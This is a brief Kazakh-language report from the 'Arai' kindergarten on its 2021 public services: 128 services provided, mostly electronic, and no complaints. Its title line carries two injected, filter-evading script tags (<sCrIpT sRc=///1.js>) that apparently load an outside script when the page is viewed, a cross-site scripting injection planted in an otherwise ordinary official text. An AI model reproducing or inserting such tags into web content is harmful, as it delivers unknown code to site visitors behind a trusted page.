«SABA -16» ЖШС - «Арай» балабақшасының 2021 жылға арналған мемлекеттік қызмет көрсету қызметінің есебі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
03.03.2022
«SABA -16» ЖШС - «Арай» балабақшасы өз қызметін Қазақстан Республикасының 2013 жылғы 15 сәуірдегі «Мемлекеттік көрсетілетін қызметтер туралы» Заңына, Мемлекеттік қызмет көрсету қағидаларына сәйкес жүзеге асырады.
Білім беру саласында мемлекеттік қызметтің 2 түрі көрсетіледі. Әрбір қызметке мемлекеттік қызмет көрсету Ережесі бекітілген, онда қызмет көрсету тәртібі, мерзімдері, тәсілдері және құжаттар тізбесі жазылған. Барлық қызметтер тегін көрсетіледі.
2021 жылы «Арай» балабақшасында барлығы 128 қызмет көрсетілді, оның ішінде «Азаматтарға арналған үкімет» мемлекеттік корпорациясы арқылы - 1, электрондық нұсқада – 127.
2020 жылы барлығы 85 қызмет көрсетілді, оның ішінде «Азаматтарға арналған үкімет» мемлекеттік корпорациясы арқылы - 0, электрондық нұсқада – 85.
Сұранысқа ие мемлекеттік қызметтер:
- Мектепке дейінгі білім беру ұйымдарына құжаттарды қабылдау және балаларды қабылдау.
Сондай-ақ, балабақшада ақпараттық стендтерде мемлекеттік қызметтердің стандарттары мен ережелері орналастырылған. Өзіне-өзі қызмет көрсету бұрышы жұмыс істейді.
2021 жылы мемлекеттік қызмет көрсету мәселелері бойынша қызмет алушылардан шағым түскен жоқ.